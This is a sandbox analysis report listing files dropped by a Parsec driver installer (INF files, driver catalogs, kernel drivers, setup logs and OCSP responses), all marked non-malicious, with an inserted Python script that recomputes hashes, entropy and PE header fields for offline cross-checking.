                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................................................j............Rich............PE..L....T.............!.....(...Z......p........@......................................5.....@A........................P6..h...$R..........8 ...........................@..T............................................P.. ...`5.......................text....&.......(.................. ..`.data........@.......,..............@....idata.......P.......6..............@..@.didat.......p.......H..............@....rsrc...8 ......."...J..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................
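Two of the fields in the dropped-file records above deserve a caveat before they are read as verdicts. "Entropy (8bit)" close to 8.0, as for the roughly 4 MB Nullsoft self-extracting archive written by 7z.exe, reflects a compressed payload and is not by itself evidence of encryption, which is why the report still prints Encrypted:false for that file. "File Type" comes from libmagic heuristics: the Inno Setup loader stub is reported only as a plain PE32 GUI executable even though its preview shows the characteristic "MZP" DOS header and "InUn" at offset 0x30. A practitioner will normally recompute these fields from a local copy of each file rather than copy them from the listing. The Python script below does that; it is an added example for this page, not Joe Sandbox code. It recomputes size, entropy, the four digests, a libmagic-style type string and the installer markers, and adds the PE linker timestamp as a further check. The type guess is this example's own approximation of libmagic's wording, and the sample bytes it builds are constructed, not the dropped files from the report.

```python
"""Recompute the fields of a dropped-file record (File Type, Size, Entropy
(8bit), MD5, SHA1, SHA-256, SHA-512) from a local copy of a file, so report
values can be cross-checked offline. Added example for this page, not Joe
Sandbox code; guess_file_type is a hypothetical approximation of libmagic's
PE/NSIS wording. All sample bytes are constructed here."""
import hashlib
import math
from collections import Counter
from datetime import datetime, timezone

IMAGE_FILE_DLL = 0x2000
SUBSYSTEMS = {2: "GUI", 3: "console"}
MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_header(data: bytes):
    """(machine, characteristics, optional magic, subsystem, timestamp) of a
    PE image, or None when the MZ/PE signatures are absent."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return None
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None

    def le(off, size):                   # little-endian field at absolute offset
        return int.from_bytes(data[off:off + size], "little")

    coff, opt = e_lfanew + 4, e_lfanew + 24   # COFF header, then optional header
    return le(coff, 2), le(coff + 18, 2), le(opt, 2), le(opt + 68, 2), le(coff + 4, 4)


def guess_file_type(data: bytes) -> str:
    """Report-style description from the PE header plus the NSIS marker."""
    hdr = pe_header(data)
    if hdr is None:
        return "MS-DOS executable" if data[:2] == b"MZ" else "data"
    machine, characteristics, magic, subsystem, _ = hdr
    fmt = "PE32+" if magic == 0x20B else "PE32"
    kind = "(DLL) " if characteristics & IMAGE_FILE_DLL else ""
    sub = SUBSYSTEMS.get(subsystem, "unknown subsystem")
    arch = MACHINES.get(machine, f"machine 0x{machine:x}")
    desc = f"{fmt} executable {kind}({sub}) {arch}, for MS Windows"
    # The NSIS first header carries the contiguous string "NullsoftInst"; libmagic
    # then reports a Nullsoft self-extracting archive, as for the file 7z.exe wrote.
    if b"NullsoftInst" in data:
        desc += ", Nullsoft Installer self-extracting archive"
    return desc


def installer_markers(data: bytes) -> list:
    """Markers the previews show but the File Type field does not name:
    the Inno Setup loader stub ('MZP' DOS header, 'InUn' at 0x30)."""
    markers = []
    if data[:3] == b"MZP" and data[0x30:0x34] == b"InUn":
        markers.append("Inno Setup stub")
    if b"NullsoftInst" in data:
        markers.append("NSIS archive")
    return markers


def describe(data: bytes) -> dict:
    """One dropped-file record computed locally; digests upper-cased as in the report."""
    rec = {"File Type": guess_file_type(data), "Size (bytes)": len(data),
           "Entropy (8bit)": shannon_entropy(data), "Markers": installer_markers(data)}
    for field, algo in (("MD5", "md5"), ("SHA1", "sha1"),
                        ("SHA-256", "sha256"), ("SHA-512", "sha512")):
        rec[field] = hashlib.new(algo, data).hexdigest().upper()
    hdr = pe_header(data)
    if hdr is not None:
        # Linker timestamp: compare with the dropper's own and with any DriverVer
        # date; epoch-zero or future values are worth a second look.
        rec["TimeDateStamp"] = datetime.fromtimestamp(hdr[4], timezone.utc).isoformat()
    return rec


def build_minimal_pe(dll: bool, gui: bool, timestamp: int = 1_700_000_000) -> bytes:
    """Constructed stand-in for a dropped PE: DOS header, PE signature, COFF
    header and a PE32 optional header with only Magic and Subsystem set."""
    dos = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little")       # e_lfanew = 0x40
    characteristics = 0x0102 | (IMAGE_FILE_DLL if dll else 0)        # EXECUTABLE | 32BIT
    coff = (b"\x4c\x01" + (1).to_bytes(2, "little") + timestamp.to_bytes(4, "little")
            + b"\0" * 8 + (96).to_bytes(2, "little") + characteristics.to_bytes(2, "little"))
    opt = bytearray(96)
    opt[0:2] = (0x10B).to_bytes(2, "little")                         # PE32 magic
    opt[68:70] = (2 if gui else 3).to_bytes(2, "little")             # GUI / console
    return dos + b"PE\0\0" + coff + bytes(opt)
```

Run `describe(open(path, "rb").read())` against a local copy and compare field by field with the record; a digest mismatch means a different file, while an entropy or type mismatch usually means a different measurement, not a different file.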
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x15b8 "Signature", at 0x68 WinDirPath, LanguageID 809, at 0x80 language en-GB
                              Category:dropped
                              Size (bytes):8660
                              Entropy (8bit):3.3733007089209863
                              Encrypted:false
                              SSDEEP:96:66BcwTdCMNyLNfWdlapY4VfOrtlBARv7Li+XT7+uZt/Y0BnuOTITdE7VGpR2bQjN:67wQMYBfeaOBA9LjXvZ1NnuT6u
                              MD5:A35E461187397BC21D7B1FFBC425EB69
                              SHA1:1F8AF576F211C42C237324A7C04D5BE9DA89C39C
                              SHA-256:0474A97D51D62B4FE7BCBAEFBDE58C25590C088CC25C93735126F98039C2C0D5
                              SHA-512:1F37125FBBDB18D5088409AA083840C9EEFF4B9318466E7B6B2F54245FBB6FB24497E31369A7A112BD0B7FF8592E4B0551CF3F30EA7D99F969B2CB135BF13CD4
                              Malicious:false
                              Preview:..........................x................$...............H...................h................!......C.:.\.W.i.n.d.o.w.s.....e.n.-.G.B...........................................................D...................................................................................................h...........................0...........|...........<...........t.......(.......................$...................................................................................................................................................................p...........P............................... .......................................|...|...........................................................|...........,...............................................................................................................................................$...................p...................@...................................................................................................
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Generic INItialization configuration [BeginLog]
                              Category:dropped
                              Size (bytes):72847
                              Entropy (8bit):5.017273388252833
                              Encrypted:false
                              SSDEEP:768:Own95cdyYloiwQ+a6WiM5XaWEgny/Epny7:O+5cdyeoiwQ+a6WiM5XaWEay/Edy7
                              MD5:EC5AA294254F6C1BF580DF1033F7FFD4
                              SHA1:A3D5016C697DB88A4459845405E64F1F5BF8090B
                              SHA-256:8FB9AD19F26952A1BC2F4D46F34E84F0FDEE9CE96D2FAF68EA28D75D457F89AC
                              SHA-512:4014E69A5A4C5E28366BA2C6A6FC9781FBE7C3E25168CAF79466FF4C4770423ADDEE2B6875CF0F4AF8D7FF768F47561157B074171A319058F91B7A387F62C45E
                              Malicious:false
                              Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):4477
                              Entropy (8bit):5.385745051115418
                              Encrypted:false
                              SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3hpTpbCpEpDk+psNVpsLim:QO00eO00erMwmkB1kAIrN4um
                              MD5:4672E4A8547BA549EB89E4A428A4423B
                              SHA1:B4EE0BA2B2E3B9C9AEFF73DE0624182C9340F9C8
                              SHA-256:8A8F89144AC14939FC2E62678C40A5F1DAA4C73626476A0D8BB017A903DD6FA1
                              SHA-512:2CA597C141311E0BBC20901C96FCCF53908AA23F9BF65D9A93A42C6C52D137A85EFB638F82E4B79CCAB0F0755DD37521B81227DC5724E3FE6C368DB344B5B10F
                              Malicious:false
                              Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):471
                              Entropy (8bit):7.2391775057961
                              Encrypted:false
                              SSDEEP:12:JyYOY5GLsHxIDJhfxyGFFROABVkhS/m7dUM:JROYILsIfLFFo2VOMm7df
                              MD5:DE60388F3921FE0CD4272D7FC99A4BD9
                              SHA1:4726073B006C9B54CDCB378212DEE2CDD4BD622B
                              SHA-256:9E8579E6133A72D13A0704175FB50353BEF2876E04E0B510D32791E47AC94C31
                              SHA-512:84325EFE7125E5C12ADBFB5EDD96147E3211C8128E02183EFFA7DB9C52255F8CE1FF20EAE5EB50E999CB4A8528EA3F8B4FB09E5FE85478559688C1B208691E0C
                              Malicious:false
                              Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241112190516Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241112190516Z....20241119190516Z0...*.H.............lN.u.GpZc..$.rA.H.2..R...w.....y|{|5...W..? x.i..t...~.t.:j..vf^P94.a-.3K..+[......6..jU..l.Q..i.a.T......y....&H .h...9.4T.4.......U.X.9....L...{=Us....1>.w..f@..%....X=M..Z.....9/:.z.....w_iH;./.@........(u.zI........h.B....+.'a...l.)1B.0.V.
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):727
                              Entropy (8bit):7.559119648888612
                              Encrypted:false
                              SSDEEP:12:5o6Tq9Vc5h44T6YC0r7EnpnS+VKdQcBwAhcaL5vsKDHznWrV/ys4y4k10HQbclA8:5ccfXsnSn7W25E+TWrxgk0HQbclAid3
                              MD5:A5634042EFD3730706BDEE80476B450A
                              SHA1:8ABBFE4869BE217929491545A01C3ED6A7071E18
                              SHA-256:A5A9EF0B62E17CE6AF43E25491E803C00D239B160D068DEC310DEC2F86D9895E
                              SHA-512:8C1C57E7FA4CE47B1592BF44C552191357AC735A5DE5FBC5F0A472F5D9E15F71CB7C38A0F094D64089FA53B58D923A44C7D660C9F7A840C934DEEC50B7A5887D
                              Malicious:false
                              Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241113202459Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...h..3P....g..[....20241113200902Z....20241120190902Z0...*.H.............wC...._x.H.....8$4...Q...sB. .!U.........:.....t]...N.*,.T...M...{.g..wlGb,QOOn..o].B.....~.yo.`._.Q..l..a.~D.3.V....O....,.+VQbq.$.6..Y.5.K.?........../w.......V.~.x..KZ.... .f...D.}....z......~S.'/.Q:Ce.".....S_..5...dd.c.S&...@.L.4..5.&..\..h.,..|....zS...4....}._B.;.c.s...*..E.T...F.Hc8...1....-.<..XcFyg{..I......Z7.n........R7T......S..u._......]g.."vn.P.... ..3..rA$.BR..y=....a=.3.vZ_..a..Wg..M.e.b.)..lL..m.f/,..v.O..Y.NLM...........$.1?c....d.T..Q..l....'.`\s.2Z>.g..q..O..a..
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):727
                              Entropy (8bit):7.55159694457111
                              Encrypted:false
                              SSDEEP:12:5onfZfc5RlRtBfQ9x4hsjfSS97Jrm6FEL2eGszjXvScgwDoJh5oMVmfCw8iATw:5ixcdZOx4hwaSZJnFEbSY6suuCwvATw
                              MD5:50C2ACCA85675897B36B7B4BE3146ABF
                              SHA1:73F0C48A8FB60EC92EBA17C7A901703234CD0F8F
                              SHA-256:0463055A40E90C7B44AE7273A2480F8FC5AC657EB7CDFD2F1D7E44129CCD5E76
                              SHA-512:1902E8B97988E3D68B02047D68686BF3C68B36E262014F0B40EF920D066B83F21FBBACA5EC3B3C37C961FC06EE39A2FAFE42A896D54F1A4FC748A31D71BA3E61
                              Malicious:false
                              Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241113184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241113184215Z....20241120184215Z0...*.H.............9....i.3L../9Y...../I.df...'*9....>i..`*};GZq%k...O..P.{...3F.....2r......W[....j........PY.&..h=.T....zY..Y0..Ou.!...1...(.RN....v..&8H.$_H......(.. HX.=..#.3A.'...<..T...1^.ZRx..V....v..y..Y....._.r.eh.[.b...<o./..;8.Vf;K.&6{.3o.0K^.Z.........U....7.*x.A......1...!........u`[SB.5%.y`..~_M..g.i......_..t.1K.<@S.d/6d.f.ya.G....l..rv..@.k}\p...d.........r..(..d..5V..v....5.@7:....#]J..o.H.tT...l.0#Y.y.@..9.Y..T.+.f8A..R.p.8.O+/....>lK...p5).,(.3.#s&.......C.Z.R...Y..a"Q...4....E....
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):400
                              Entropy (8bit):3.9102857171427017
                              Encrypted:false
                              SSDEEP:6:kKy9/VEk9/IBQEXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:A/VAuamxMiv8sFzD3quqDkPh8Y2ZM
                              MD5:A996B182C0635F92CCE244B4E50318EF
                              SHA1:123F39C245DEB7670C974CEB8FC17CBE0D7A304B
                              SHA-256:DE685C0B255C51EAA2E874BB7056E461A19E380C09AE87A9CB10BE187CA5FC92
                              SHA-512:0D154F181FD6BA82AA266A84B171054ED03675BBE0A3D4D2F38AFED12A31531972EBCE1E1FD41DDA614B1A2F1C9AEBD252155015D47085FD02E6FF2FB2AE6626
                              Malicious:false
                              Preview:p...... ........w3.:6..(................>..55...~...:...................~...:.. ..........c-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):408
                              Entropy (8bit):3.9464847979504727
                              Encrypted:false
                              SSDEEP:6:kKIF/TjAQfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhle6C9o1kn:2DmxMiv8sF3HtllJZIvOP20S9o1k
                              MD5:1177E50A76DB3838AE6C8476E3E2F6EE
                              SHA1:3F5E8DD211729A7F05440A3D581732F2341A0F44
                              SHA-256:E54BB9E0B5024CE6D226D21AC0F9D605D2BED1AF6305F17ED72B4C3AB580A1D3
                              SHA-512:018E86C89DA5F7A196BEF3FF00953AABDF05673D253A43FC10EDFC1D24D8F1F5DB8770CEB1EC76DCDEDA676E6BD19EE3AC1BADC5AD90B378D747337484F144C1
                              Malicious:false
